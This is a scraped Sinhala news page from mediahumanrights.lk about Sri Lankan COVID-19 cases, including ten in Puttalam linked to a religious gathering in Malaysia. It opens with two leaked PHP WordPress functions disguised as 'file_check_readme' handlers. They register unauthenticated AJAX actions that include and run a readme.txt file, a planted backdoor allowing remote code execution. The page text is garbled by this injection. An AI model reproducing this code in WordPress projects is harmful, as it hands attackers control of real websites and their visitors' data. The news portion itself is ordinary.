if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } පුත්තලමෙන් හමු වු කොරෝනා ආසාදිතයින් මලයාසියාවේ දේව මෙහෙයකට සහභාගී වු පිරිසක් - mediahumanrights.lk
mediahumanrights.lk
Local News News

පුත්තලමෙන් හමු වු කොරෝනා ආසාදිතයින් මලයාසියාවේ දේව මෙහෙයකට සහභාගී වු පිරිසක්

ඊයේ (31) රාත්‍රියේ වාර්තා වූ කොරෝනා ආසාදිතයිගෙන් 10 දෙනෙකුම පුත්තලම ප්‍රදේශයේ වන අතර මොවුන් මලයාසියාවේ දේව මෙහෙයකට සහභාගී වී පැමිණි අය සහ ඔවුන් ඇසුරු කළ පුද්ගලයින් බවට තොරතුරු වාර්තා වී තිබේ.

කෙසේවෙතත් කොරෝනා වෛරසය ආසාදනය වී සිටි පුද්ගලයින් 17 දෙනෙකු ඊයේ වනවිට පූර්ණ සුවය ලබා රෝහල් වලින් පිටව ගියේය.

ඒ අනුව මේ වන විට ආසාදිතයින් 124 දෙනෙකු අයි.ඩී.එච් රෝහල ඇතුලු රෝහල් කිහිපයක තවදුරටත් ප්‍රතිකාර ලබයි.

නව කොරෝනා වෛරසය ආසාදනය වී ඇති බවට සැක පල කරන තවත් රෝගීන් 173 දෙනෙකු වෛද්‍ය අධීක්ෂණය යටතේ තවදුරටත් රෝහල්ගතව සිටින බව වසංගත රෝග විද්‍යා අංශය සදහන් කළේය.

කොරෝනා වෛරසය ආසාදනය වීමෙන් මේ වනවිට මෙරටින් වාර්තා වී ඇති මරණ සංඛ්‍යාව 02ක්.

(under the courtesy of adaderana.lk news web)

Related posts

ලෙබනන් පිපිරීමෙන් ශ‍්‍රී ලංකා තානාපති කාර්යාලයටත් හානි – තුවාල වූ ශ්‍රී ලාංකිකයින් ගැනත් සොයයි

Shiran Viraj

තැපැල් වර්ජනය අවසන්

Shiran Viraj

ඉන්දියාවේ විශාලතම ඔන්ලයින් ටැක්සි මෙහෙයුම්කරු ලංකාවට මාන බලයි

Shiran Viraj